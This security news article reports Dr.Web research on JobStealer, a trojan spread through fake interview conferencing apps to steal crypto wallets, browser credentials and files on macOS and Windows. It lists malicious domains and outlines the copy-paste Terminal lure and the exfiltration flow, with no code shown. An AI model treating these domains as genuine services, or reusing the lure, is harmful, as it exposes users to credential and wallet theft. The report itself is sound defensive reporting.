A fake job interview is now being used as bait to steal crypto wallets, browser credentials, and sensitive files from both Windows and macOS users. Researchers at Dr.Web say the malware campaign revolves around a trojan called JobStealer, which disguises itself as a video conferencing app during the hiring process.
This malware campaign begins with scammers approaching victims with job offers and inviting them to attend an online interview through a custom meeting platform. The websites look clean, complete with branding, social media accounts, and Telegram channels designed to make the services appear active and trustworthy.
However, instead of joining an interview, users end up downloading malware. Researchers identified fake conferencing apps using names such as MeetLab, Meetix, Juseo, and Carolla. Some sites even impersonate legitimate services like Cisco Webex to reduce suspicion.
List of malicious sites used in this campaign includes the following:
Meetlab.ioMeetix.appCarolla.appCloudproxy.link
JobStealer Malware Targeting macOS
On macOS systems, attackers use two installation methods. One method asks the user to copy and paste a Bash command into Terminal. The other delivers a DMG file that includes fake installation instructions. In both cases, the victim is tricked into launching the Trojan manually, which helps the malware bypass normal security warnings.
That detail matters because the malware depends heavily on user interaction. The malicious script downloads a file detected as Mac.PWS.JobStealer.1, which is built to run on both Intel and Apple Silicon Macs. According to Dr.Web’s blog post, newer versions added stronger obfuscation and arm64 support after earlier variants failed to run properly on newer Mac hardware.
Once active, the malware displays a fake error message asking the victim for their macOS account password. From there, it begins collecting a wide range of data from the infected system.
The primary target appears to be cryptocurrency assets, with JobStealer searching Chromium-based browsers, including Chrome, Brave, Opera, Edge, Vivaldi, Arc, and CocCoc, for roughly 300 crypto wallet extensions.
It also extracts browser cookies, saved passwords, autofill payment data, Telegram session files, notes stored in Apple Notes, and traces of hardware wallet software such as Ledger Live and Trezor Suite.
After collecting the information, the malware compresses the files into a ZIP archive and uploads them to a command and control server controlled by the attackers.
JobStealer Targets More Platforms
Dr.Web also identified a Windows version of JobStealer with similar data theft capabilities. While the macOS variant uses Terminal commands and fake DMG installers, the Windows samples follow the same fake interview approach and focus on stealing browser data, crypto wallets, and user credentials.
Worse, researchers also found download sections for Linux, iOS, and Android variants on some malicious sites, although those versions do not appear to be fully deployed yet.
Users should avoid running Terminal commands provided during interviews, especially when shared through unofficial meeting platforms or unfamiliar websites. Downloading conferencing software directly from official vendor sites remains the safer option. Companies conducting legitimate interviews rarely require candidates to bypass operating system protections or manually execute scripts.
Dr.Web mapped the malware activity to several MITRE ATT&CK techniques, including malicious copy and paste execution, credential theft from browsers and keychains, automated data collection, and exfiltration through web services.
The campaign also shows how threat actors are adapting social engineering tactics to fit the remote work culture instead of depending solely on phishing emails or malicious attachments.
